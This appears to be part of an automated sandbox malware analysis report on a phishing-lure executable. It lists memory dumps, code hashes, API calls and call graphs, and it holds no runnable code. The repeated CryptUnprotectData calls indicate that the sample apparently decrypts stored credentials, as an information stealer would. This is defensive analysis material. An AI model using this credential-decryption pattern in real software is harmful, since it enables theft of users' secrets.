                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6fac6182e0c923e6f8468ecc0aebbda853cd3f7fcdb5da74eabe1b8512e0ee84
                                                                    • Instruction ID: 52dfaafe50a83d16d2aca4474dbfbf9792b45fca5ae70f0232ed595026c100c8
                                                                    • Opcode Fuzzy Hash: 6fac6182e0c923e6f8468ecc0aebbda853cd3f7fcdb5da74eabe1b8512e0ee84
                                                                    • Instruction Fuzzy Hash: E7713371E00229DBDF28CFA8C844BADBBB1FF44305F15806AD816BB291C7795A96DF44
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c2091b8c3b7c8f3891448e563915a78250ffa21a1e2beee4011ac230f586c236
                                                                    • Instruction ID: fadc0c566b3b685b80e6fde1c1dc985280178bf592964274442c35b5c3ef9333
                                                                    • Opcode Fuzzy Hash: c2091b8c3b7c8f3891448e563915a78250ffa21a1e2beee4011ac230f586c236
                                                                    • Instruction Fuzzy Hash: 1D713571E00229DBDF28CF98C844BADBBB1FF44305F15806AD816BB291C7799A96DF44
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LRsq$LRsq$$sq$$sq
                                                                    • API String ID: 0-3770098177
                                                                    • Opcode ID: 87341cd5473baf89e2f2db39474844bc60fcaab6029a3edb79ac5c8cb8127e78
                                                                    • Instruction ID: f23ea4ddc16e4471ed38805b83ba560b4b10829e6900730d37c14ea93565dd17
                                                                    • Opcode Fuzzy Hash: 87341cd5473baf89e2f2db39474844bc60fcaab6029a3edb79ac5c8cb8127e78
                                                                    • Instruction Fuzzy Hash: B45182B47002069FDB18DB78C891A9AB7A6FF89310F248569E4059F356EF34ED45CB90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111732797126.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3a7c0000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $sq$$sq$$sq$$sq
                                                                    • API String ID: 0-2855845837
                                                                    • Opcode ID: 7646022605e5df10aecf72faefb1a9986cef76d5f3c1a15c0a249b6cd31bffbe
                                                                    • Instruction ID: 55802d98ef22224147b5d1c718bd9cdfe821e82f9b707942bb73ceb485cd24b4
                                                                    • Opcode Fuzzy Hash: 7646022605e5df10aecf72faefb1a9986cef76d5f3c1a15c0a249b6cd31bffbe
                                                                    • Instruction Fuzzy Hash: E851BE35A002059FEBA5DB64C9C069EBBB3FF98350F658529E405EB345EB34DC86CB80
                                                                    APIs
                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B64
                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B7C
                                                                    • CharNextA.USER32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B8D
                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B96
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.111695317113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.111695260461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695383965.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695450285.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.111695518563.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 190613189-0
                                                                    • Opcode ID: 922b063ced0d048d400f1e9b804922caee6ea3aadebd60a230e58aa4fefa9f78
                                                                    • Instruction ID: 09ddfbf6a96cc3af2c4d2f748c9cef087a74b3384d996a5f3154f8737d8de66f
                                                                    • Opcode Fuzzy Hash: 922b063ced0d048d400f1e9b804922caee6ea3aadebd60a230e58aa4fefa9f78
                                                                    • Instruction Fuzzy Hash: 86F0C231904514EFC7129FA5CC00D9FBBB8EF06350B2540A5E800F7351D634FE019BA9

                                                                    Execution Graph

                                                                    Execution Coverage:14.5%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:2.5%
                                                                    Total number of Nodes:198
                                                                    Total number of Limit Nodes:24
                                                                    execution_graph 23699 151381 23701 151396 23699->23701 23700 1514b9 23701->23700 23705 1571b0 23701->23705 23710 157088 23701->23710 23717 157098 23701->23717 23706 1571ba 23705->23706 23707 15721a 23706->23707 23724 39fde8a1 23706->23724 23728 39fde8b0 23706->23728 23707->23701 23711 1570ae 23710->23711 23713 15715f 23711->23713 23899 157646 23711->23899 23712 15721a 23712->23701 23713->23712 23714 39fde8a1 2 API calls 23713->23714 23715 39fde8b0 2 API calls 23713->23715 23714->23712 23715->23712 23718 1570ae 23717->23718 23720 15715f 23718->23720 23723 157646 2 API calls 23718->23723 23719 15721a 23719->23701 23720->23719 23721 39fde8a1 2 API calls 23720->23721 23722 39fde8b0 2 API calls 23720->23722 23721->23719 23722->23719 23723->23718 23725 39fde8b0 23724->23725 23726 39fde93f 23725->23726 23732 39fdead0 23725->23732 23729 39fde8c9 23728->23729 23730 39fde93f 23729->23730 23731 39fdead0 2 API calls 23729->23731 23731->23729 23734 39fdeae5 23732->23734 23733 39fdeb13 23733->23725 23734->23733 23742 39fdf65d 23734->23742 23747 39fdf4b8 23734->23747 23752 39fdf4b3 23734->23752 23757 39fded96 23734->23757 23762 39fded17 23734->23762 23767 39fdeb30 23734->23767 23772 39fdeb20 23734->23772 23744 39fdf52e 23742->23744 23743 39fdf689 23744->23743 23777 39fdf88d 23744->23777 23784 39fdfa93 23744->23784 23749 39fdf4cf 23747->23749 23748 39fdf689 23749->23748 23750 39fdf88d 2 API calls 23749->23750 23751 39fdfa93 2 API calls 23749->23751 23750->23749 23751->23749 23753 39fdf4cf 23752->23753 23754 39fdf689 23753->23754 23755 39fdf88d 2 API calls 23753->23755 23756 39fdfa93 2 API calls 23753->23756 23755->23753 23756->23753 23759 39fdeba6 23757->23759 23758 39fdedc2 23759->23758 23883 39fdf1ce 23759->23883 23891 39fdefab 23759->23891 23764 39fdeba6 23762->23764 23763 39fdedc2 23764->23763 23765 39fdf1ce 2 API calls 23764->23765 23766 39fdefab 2 API calls 23764->23766 23765->23764 23766->23764 23768 39fdeb47 23767->23768 23769 39fdedc2 23768->23769 23770 39fdf1ce 2 API calls 23768->23770 23771 39fdefab 2 API calls 23768->23771 23770->23768 23771->23768 23774 39fdeb47 23772->23774 23773 39fdedc2 23774->23773 23775 39fdf1ce 2 API calls 23774->23775 23776 39fdefab 2 API calls 23774->23776 23775->23774 23776->23774 23778 39fdf8ba 23777->23778 23779 39fdfad4 23778->23779 23791 159094 23778->23791 23805 1593be 23778->23805 23819 159410 23778->23819 23826 1591c0 23778->23826 23779->23744 23785 39fdf8ba 23784->23785 23786 39fdfad4 23785->23786 23787 159094 2 API calls 23785->23787 23788 1591c0 2 API calls 23785->23788 23789 159410 2 API calls 23785->23789 23790 1593be 2 API calls 23785->23790 23786->23744 23787->23785 23788->23785 23789->23785 23790->23785 23794 15909b 23791->23794 23792 1593ed 23792->23778 23793 1593fa 23795 15948a 23793->23795 23800 159094 2 API calls 23793->23800 23801 1591c0 2 API calls 23793->23801 23802 159410 2 API calls 23793->23802 23803 1593be 2 API calls 23793->23803 23794->23792 23794->23793 23797 159094 CryptUnprotectData CryptUnprotectData 23794->23797 23798 1591c0 CryptUnprotectData CryptUnprotectData 23794->23798 23799 159410 CryptUnprotectData CryptUnprotectData 23794->23799 23804 1593be CryptUnprotectData CryptUnprotectData 23794->23804 23840 15f7fe 23794->23840 23795->23778 23797->23794 23798->23794 23799->23794 23800->23795 23801->23795 23802->23795 23803->23795 23804->23794 23813 1590c9 23805->23813 23806 1593ed 23806->23778 23807 1593fa 23808 15948a 23807->23808 23809 159094 2 API calls 23807->23809 23810 1591c0 2 API calls 23807->23810 23811 159410 2 API calls 23807->23811 23812 1593be 2 API calls 23807->23812 23808->23778 23809->23808 23810->23808 23811->23808 23812->23808 23813->23806 23813->23807 23814 15f7fe 2 API calls 23813->23814 23815 159094 CryptUnprotectData CryptUnprotectData 23813->23815 23816 1591c0 CryptUnprotectData CryptUnprotectData 23813->23816 23817 159410 CryptUnprotectData CryptUnprotectData 23813->23817 23818 1593be CryptUnprotectData CryptUnprotectData 23813->23818 23814->23813 23815->23813 23816->23813 23817->23813 23818->23813 23820 159421 23819->23820 23821 15948a 23820->23821 23822 159094 2 API calls 23820->23822 23823 1591c0 2 API calls 23820->23823 23824 159410 2 API calls 23820->23824 23825 1593be 2 API calls 23820->23825 23821->23778 23822->23821 23823->23821 23824->23821 23825->23821 23829 1590c9 23826->23829 23827 1593ed 23827->23778 23828 1593fa 23830 15948a 23828->23830 23831 159094 2 API calls 23828->23831 23832 1591c0 2 API calls 23828->23832 23833 159410 2 API calls 23828->23833 23834 1593be 2 API calls 23828->23834 23829->23827 23829->23828 23835 159094 CryptUnprotectData CryptUnprotectData 23829->23835 23836 1591c0 CryptUnprotectData CryptUnprotectData 23829->23836 23837 159410 CryptUnprotectData CryptUnprotectData 23829->23837 23838 1593be CryptUnprotectData CryptUnprotectData 23829->23838 23839 15f7fe 2 API calls 23829->23839 23830->23778 23831->23830 23832->23830 23833->23830 23834->23830 23835->23829 23836->23829 23837->23829 23838->23829 23839->23829 23841 15f812 23840->23841 23842 15f84d 23840->23842 23845 15f8e1 23841->23845 23850 15f8f0 23841->23850 23842->23794 23846 15f8f0 23845->23846 23855 39fd001e 23846->23855 23864 39fd0040 23846->23864 23847 15f91e 23847->23842 23851 15f907 23850->23851 23853 39fd001e 2 API calls 23851->23853 23854 39fd0040 2 API calls 23851->23854 23852 15f91e 23852->23842 23853->23852 23854->23852 23856 39fd0040 23855->23856 23857 39fd0119 23856->23857 23861 39fd001e 2 API calls 23856->23861 23863 39fd0040 2 API calls 23856->23863 23873 39fd0221 23856->23873 23878 39fd04c8 23857->23878 23881 39fd04d0 CryptUnprotectData 23857->23881 23858 39fd02e5 23858->23847 23861->23857 23863->23857 23865 39fd0065 23864->23865 23867 39fd0119 23864->23867 23865->23867 23868 39fd001e 2 API calls 23865->23868 23869 39fd0221 2 API calls 23865->23869 23870 39fd0040 2 API calls 23865->23870 23866 39fd02e5 23866->23847 23871 39fd04c8 CryptUnprotectData 23867->23871 23872 39fd04d0 CryptUnprotectData 23867->23872 23868->23867 23869->23867 23870->23867 23871->23866 23872->23866 23874 39fd0235 23873->23874 23876 39fd04c8 CryptUnprotectData 23874->23876 23877 39fd04d0 CryptUnprotectData 23874->23877 23875 39fd02e5 23875->23857 23876->23875 23877->23875 23879 39fd04d0 CryptUnprotectData 23878->23879 23880 39fd0544 23879->23880 23880->23858 23882 39fd0544 23881->23882 23882->23858 23885 39fdefd4 23883->23885 23884 39fdf20f 23884->23759 23885->23884 23886 15f7fe 2 API calls 23885->23886 23887 159094 2 API calls 23885->23887 23888 1591c0 2 API calls 23885->23888 23889 159410 2 API calls 23885->23889 23890 1593be 2 API calls 23885->23890 23886->23885 23887->23885 23888->23885 23889->23885 23890->23885 23893 39fdefd4 23891->23893 23892 39fdf20f 23892->23759 23893->23892 23894 15f7fe 2 API calls 23893->23894 23895 159094 2 API calls 23893->23895 23896 1591c0 2 API calls 23893->23896 23897 159410 2 API calls 23893->23897 23898 1593be 2 API calls 23893->23898 23894->23893 23895->23893 23896->23893 23897->23893 23898->23893 23900 157651 23899->23900 23901 157e15 23900->23901 23905 158e82 23900->23905 23910 158f33 23900->23910 23915 158e90 23900->23915 23901->23711 23907 158e87 23905->23907 23906 158f49 23907->23906 23920 158f90 23907->23920 23926 158f80 23907->23926 23912 158f08 23910->23912 23911 158f49 23912->23911 23913 158f90 2 API calls 23912->23913 23914 158f80 2 API calls 23912->23914 23913->23912 23914->23912 23917 158e9d 23915->23917 23916 158f49 23917->23916 23918 158f90 2 API calls 23917->23918 23919 158f80 2 API calls 23917->23919 23918->23917 23919->23917 23921 158faa 23920->23921 23922 15906a 23921->23922 23923 159094 2 API calls 23921->23923 23924 1591c0 2 API calls 23921->23924 23925 1593be 2 API calls 23921->23925 23923->23921 23924->23921 23925->23921 23928 158faa 23926->23928 23927 15906a 23928->23927 23929 159094 2 API calls 23928->23929 23930 1591c0 2 API calls 23928->23930 23931 1593be 2 API calls 23928->23931 23929->23928 23930->23928 23931->23928

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1184 3a9008d0-3a9008e2 1185 3a9008e4-3a90091a 1184->1185 1186 3a900946-3a90094d 1184->1186 1192 3a900921-3a900923 1185->1192 1193 3a900925-3a90093e 1192->1193 1194 3a90094e-3a9009b5 1192->1194 1193->1186 1204 3a9009b7-3a9009b9 1194->1204 1205 3a9009be-3a9009ce 1194->1205 1206 3a900c5d-3a900c64 1204->1206 1207 3a9009d0 1205->1207 1208 3a9009d5-3a9009e5 1205->1208 1207->1206 1210 3a900c44-3a900c52 1208->1210 1211 3a9009eb-3a9009f9 1208->1211 1214 3a900c65-3a900cde 1210->1214 1216 3a900c54-3a900c56 1210->1216 1211->1214 1215 3a9009ff 1211->1215 1215->1214 1217 3a900a90-3a900ab1 1215->1217 1218 3a900c14-3a900c36 1215->1218 1219 3a900ab6-3a900ad7 1215->1219 1220 3a900bf7-3a900c12 1215->1220 1221 3a900c38-3a900c42 1215->1221 1222 3a900adc-3a900afd 1215->1222 1223 3a900b5c-3a900b99 1215->1223 1224 3a900a1d-3a900a3e 1215->1224 1225 3a900b9e-3a900bc4 1215->1225 1226 3a900b02-3a900b2a 1215->1226 1227 3a900a43-3a900a65 1215->1227 1228 3a900a06-3a900a18 1215->1228 1229 3a900bc9-3a900bf5 1215->1229 1230 3a900a6a-3a900a8b 1215->1230 1231 3a900b2f-3a900b57 1215->1231 1216->1206 1217->1206 1218->1206 1219->1206 1220->1206 1221->1206 1222->1206 1223->1206 1224->1206 1225->1206 1226->1206 1227->1206 1228->1206 1229->1206 1230->1206 1231->1206
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.111733456309.000000003A900000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A900000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_3a900000_vexplorers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Xwq$$sq
                                                                    • API String ID: 0-2558833440
                                                                    • Opcode ID: 98df1b00fe23d8f3bebe407ecbe351d49e004117cfa07be068e2e8fe8a2d75b3
                                                                    • Instruction ID: be9ba757b4e0e7306aea664f182041ee482464213d6b0e74710de45b0211d854
                                                                    • Opcode Fuzzy Hash: 98df1b00fe23d8f3bebe407ecbe351d49e004117cfa07be068e2e8fe8a2d75b3
                                                                    • Instruction Fuzzy Hash: 31B1D534B003149BDB2CDB78885526EBBA7BFC8751B06852ED417EB385DE38CC068B91
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.111694968331.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_150000_vexplorers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 564635a90d2aee7bef6addc4c1d486c57a68b51d1294c6910e7896005b4569af
                                                                    • Instruction ID: b120ad8db8c18037dcef764d42743896a4ffc6e372706b02b884cbd685f96d3f
                                                                    • Opcode Fuzzy Hash: 564635a90d2aee7bef6addc4c1d486c57a68b51d1294c6910e7896005b4569af
                                                                    • Instruction Fuzzy Hash: 7523FC31D10B19CADB11EF68C8945ADF7B1FF99300F15C79AE458AB221EB70AAC5CB41
                                                                    APIs
                                                                    • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 39FD0535
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.111732104162.0000000039FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39FD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_39fd0000_vexplorers.jbxd
                                                                    Similarity
                                                                    • API ID: CryptDataUnprotect
                                                                    • String ID:
                                                                    • API String ID: 834300711-0
                                                                    • Opcode ID: 293e2cbc21b27c9a273415fe75f0e0b35403e588694522132cf006ebadcbfd93
                                                                    • Instruction ID: 48e66f03b2a15058cfe6d4104eb11324b849500607f9b9cdd4a9eba6defe48f8
                                                                    • Opcode Fuzzy Hash: 293e2cbc21b27c9a273415fe75f0e0b35403e588694522132cf006ebadcbfd93
                                                                    • Instruction Fuzzy Hash: B82126B680024ADFDB10CF9AD845BDEBFF4EF58320F248419E918A7600D379A550DFA1
                                                                    APIs
                                                                    • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 39FD0535
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.111732104162.0000000039FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39FD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_39fd0000_vexplorers.jbxd
                                                                    Similarity
                                                                    • API ID: CryptDataUnprotect
                                                                    • String ID:
                                                                    • API String ID: 834300711-0
                                                                    • Opcode ID: 3138c5739bb38f3d07cff059b9b8c60b27097e48542a8058a89d8c2607014575
                                                                    • Instruction ID: 59cb073ca01ad1047c6e3b3cb63cda099d3943f34b8792928c00b5882a83565e
                                                                    • Opcode Fuzzy Hash: 3138c5739bb38f3d07cff059b9b8c60b27097e48542a8058a89d8c2607014575
                                                                    • Instruction Fuzzy Hash: D81146B680024ADFCB10CF9AD841BDEBFF4EF58320F148419E918A7200C379A550DFA1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.111694968331.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_150000_vexplorers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \V|j
                                                                    • API String ID: 0-3863184312
                                                                    • Opcode ID: fb90c11da1022d58f38fedefecaa03e6af4d58961195c79603074e656b16b022
                                                                    • Instruction ID: 5ff3101e80f19e4688ee7b0774ba2104582a5dc9f7275dfc9fc588066158b456
                                                                    • Opcode Fuzzy Hash: fb90c11da1022d58f38fedefecaa03e6af4d58961195c79603074e656b16b022
                                                                    • Instruction Fuzzy Hash: 7FB16570E00619CFDB14CFA9D9857DDBBF2BF98309F148129E825EB254EB749889CB41
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.111694968331.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_150000_vexplorers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: \V|j
                                                                    • API String ID: 0-3863184312
                                                                    • Opcode ID: 203739ac94f3caa1bebfcfd928aba3fd8e2b70d6bd2b3261e6b0bdd2cdec6197
                                                                    • Instruction ID: 3d8acf7601078a062d890c7b73c942c18d09da092659ef9f1309502810b289c9
                                                                    • Opcode Fuzzy Hash: 203739ac94f3caa1bebfcfd928aba3fd8e2b70d6bd2b3261e6b0bdd2cdec6197
                                                                    • Instruction Fuzzy Hash: C5918270E00209CFDF14CFA9C9857DEBBF2EF48345F248529E825AB294EB749949CB51
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.111694968331.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_150000_vexplorers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e129a4211c502aba12027ef44d57ccb0dc7864c1dc8855765863cf3d2cf9243b
                                                                    • Instruction ID: 780b77bbf7ee179ba9491993fc1db070c28d21847b990ff60fc598974eee76a0
                                                                    • Opcode Fuzzy Hash: e129a4211c502aba12027ef44d57ccb0dc7864c1dc8855765863cf3d2cf9243b
                                                                    • Instruction Fuzzy Hash: 83B16370E00209CFDF14CFA9C9857DDBBF2AF88359F148529D825EB254EB749889CB85

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1054 3a900ef8-3a900f1a 1055 3a900f1c-3a900f1f 1054->1055 1056 3a900f21-3a900f3d 1055->1056 1057 3a900f42-3a900f45 1055->1057 1056->1057 1058 3a900f47-3a900f51 1057->1058 1059 3a900f5c-3a900f5f 1057->1059 1071 3a900ff1-3a901012 1058->1071 1072 3a900f57 1058->1072 1061 3a900f61-3a900f8d 1059->1061 1062 3a900f92-3a900f95 1059->1062 1061->1062 1064 3a900fb5-3a900fb8 1062->1064 1065 3a900f97-3a900faa 1062->1065 1068 3a900fd4-3a900fd7 1064->1068 1069 3a900fba-3a900fcf 1064->1069 1066 3a900fb0 1065->1066 1067 3a901109-3a901110 1065->1067 1066->1064 1073 3a901115-3a901118 1067->1073 1074 3a901168-3a90116a 1068->1074 1075 3a900fdd-3a900fe0 1068->1075 1069->1068 1085 3a901017-3a90101a 1071->1085 1072->1059 1078 3a901138-3a90113b 1073->1078 1079 3a90111a-3a901133 1073->1079 1076 3a901170 1074->1076 1077 3a90132f-3a90136a 1074->1077 1081 3a900fe2-3a900fe9 1075->1081 1082 3a900fec-3a900fef 1075->1082 1084 3a901175-3a901178 1076->1084 1127 3a90137c 1077->1127 1128 3a90136c-3a90137a 1077->1128 1086 3a901163-3a901166 1078->1086 1087 3a90113d-3a90115e 1078->1087 1079->1078 1082->1071 1082->1085 1088 3a901190-3a901193 1084->1088 1089 3a90117a-3a90118b 1084->1089 1094 3a901031-3a901034 1085->1094 1095 3a90101c-3a90102c 1085->1095 1086->1074 1086->1084 1087->1086 1098 3a9011b0-3a9011b3 1088->1098 1099 3a901195-3a9011ab 1088->1099 1089->1088 1096 3a901051-3a901054 1094->1096 1097 3a901036-3a90104c 1094->1097 1095->1094 1105 3a901056-3a901064 1096->1105 1106 3a901069-3a90106c 1096->1106 1097->1096 1107 3a901202-3a901205 1098->1107 1108 3a9011b5-3a9011fd 1098->1108 1099->1098 1105->1106 1113 3a9010c8-3a9010cb 1106->1113 1114 3a90106e-3a9010c3 1106->1114 1111 3a901207-3a901224 1107->1111 1112 3a901229-3a90122c 1107->1112 1108->1107 1111->1112 1120 3a90123a-3a90123c 1112->1120 1121 3a90122e-3a901235 1112->1121 1116 3a9010e3-3a9010e6 1113->1116 1117 3a9010cd-3a9010de 1113->1117 1114->1113 1130 3a9010f7-3a9010fa 1116->1130 1131 3a9010e8-3a9010ec 1116->1131 1117->1116 1123 3a901243-3a901246 1120->1123 1124 3a90123e 1120->1124 1121->1120 1123->1055 1134 3a90124c-3a90125b 1123->1134 1124->1123 1142 3a901384-3a901399 1127->1142 1128->1142 1137 3a901104-3a901107 1130->1137 1138 3a9010fc-3a901101 1130->1138 1131->1077 1136 3a9010f2 1131->1136 1147 3a901261-3a901276 1134->1147 1148 3a901317-3a90132c 1134->1148 1136->1130 1137->1067 1137->1073 1138->1137 1154 3a9013ab 1142->1154 1155 3a90139b-3a9013a9 1142->1155 1158 3a90127d-3a901311 1147->1158 1148->1077 1160 3a9013b3-3a9013f3 1154->1160 1155->1160 1158->1147 1158->1148 1170 3a9013fb-3a90142e 1160->1170 1178 3a901430-3a901435 1170->1178 1179 3a90143b 1170->1179 1178->1179 1182 3a90143c 1179->1182 1182->1182
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.111733456309.000000003A900000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A900000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_3a900000_vexplorers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Tesq$Tesq
                                                                    • API String ID: 0-1365298620
                                                                    • Opcode ID: 7ff4fc6edbfc85411dc93e1a915a212535541af6fd7e230a2e0858306f7f702c
                                                                    • Instruction ID: 018ecb729ad83c90a02d494fb5c9d9af0b3976f74742dd120074730a70e83bbd
                                                                    • Opcode Fuzzy Hash: 7ff4fc6edbfc85411dc93e1a915a212535541af6fd7e230a2e0858306f7f702c
                                                                    • Instruction Fuzzy Hash: 18E17A74A003158FEB18DBA8C890A9DB7B6EF89350F748529E406EB351CB75EC46CF80

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2055 15f4c8-15f4e4 2056 15f4e6-15f4e9 2055->2056 2057 15f4f7-15f4fa 2056->2057 2058 15f4eb-15f4f4 2056->2058 2059 15f500-15f503 2057->2059 2060 15f57f-15f583 2057->2060 2061 15f505-15f50e 2059->2061 2062 15f560-15f563 2059->2062 2063 15f585 2060->2063 2064 15f5e4-15f5fa 2060->2064 2065 15f514-15f559 2061->2065 2066 15f5fd-15f620 2061->2066 2067 15f565-15f568 2062->2067 2068 15f58f-15f592 2062->2068 2069 15f58a-15f58d 2063->2069 2078 15f574-15f575 2065->2078 2120 15f55b 2065->2120 2083 15f643-15f646 2066->2083 2070 15f56f-15f572 2067->2070 2071 15f56a-15f56c 2067->2071 2068->2061 2074 15f598 2068->2074 2069->2068 2073 15f59d-15f5a0 2069->2073 2070->2078 2079 15f57a-15f57d 2070->2079 2071->2070 2075 15f5b4-15f5b7 2073->2075 2076 15f5a2-15f5af 2073->2076 2074->2073 2081 15f5c5-15f5c8 2075->2081 2082 15f5b9-15f5c0 2075->2082 2076->2075 2078->2079 2079->2060 2079->2069 2086 15f5d2-15f5d4 2081->2086 2087 15f5ca-15f5cd 2081->2087 2082->2081 2084 15f64f-15f652 2083->2084 2085 15f648-15f64c 2083->2085 2089 15f654-15f65a 2084->2089 2090 15f661-15f663 2084->2090 2091 15f5d6 2086->2091 2092 15f5db-15f5de 2086->2092 2087->2086 2093 15f622-15f628 2089->2093 2094 15f65c 2089->2094 2090->2083 2095 15f665-15f66a 2090->2095 2091->2092 2092->2056 2092->2064 2097 15f68f-15f6c4 2093->2097 2098 15f62a-15f63a 2093->2098 2094->2090 2095->2083 2106 15f6c6-15f6c9 2097->2106 2099 15f66c-15f675 2098->2099 2100 15f63c-15f640 2098->2100 2099->2097 2102 15f677-15f684 2099->2102 2102->2097 2104 15f686-15f68c 2102->2104 2107 15f6df-15f6e2 2106->2107 2108 15f6cb-15f6da 2106->2108 2110 15f87c-15f87f 2107->2110 2111 15f6e8-15f72e 2107->2111 2108->2107 2113 15f881-15f88f 2110->2113 2114 15f89a-15f89d 2110->2114 2133 15f736-15f738 2111->2133 2113->2111 2123 15f895 2113->2123 2116 15f89f-15f8a7 2114->2116 2117 15f8a8-15f8ab 2114->2117 2121 15f8c1-15f8c3 2117->2121 2122 15f8ad-15f8bc 2117->2122 2120->2062 2125 15f8c5 2121->2125 2126 15f8ca-15f8cd 2121->2126 2122->2121 2123->2114 2125->2126 2126->2106 2128 15f8d3-15f8dc 2126->2128 2134 15f7cd-15f7f1 2133->2134 2135 15f73e-15f748 2133->2135 2145 15f7f3 2134->2145 2146 15f7fb 2134->2146 2138 15f760-15f766 2135->2138 2139 15f74a-15f750 2135->2139 2143 15f7bd-15f7c7 2138->2143 2144 15f768-15f79c 2138->2144 2141 15f754-15f756 2139->2141 2142 15f752 2139->2142 2141->2138 2142->2138 2143->2134 2143->2135 2144->2143 2145->2146 2146->2110
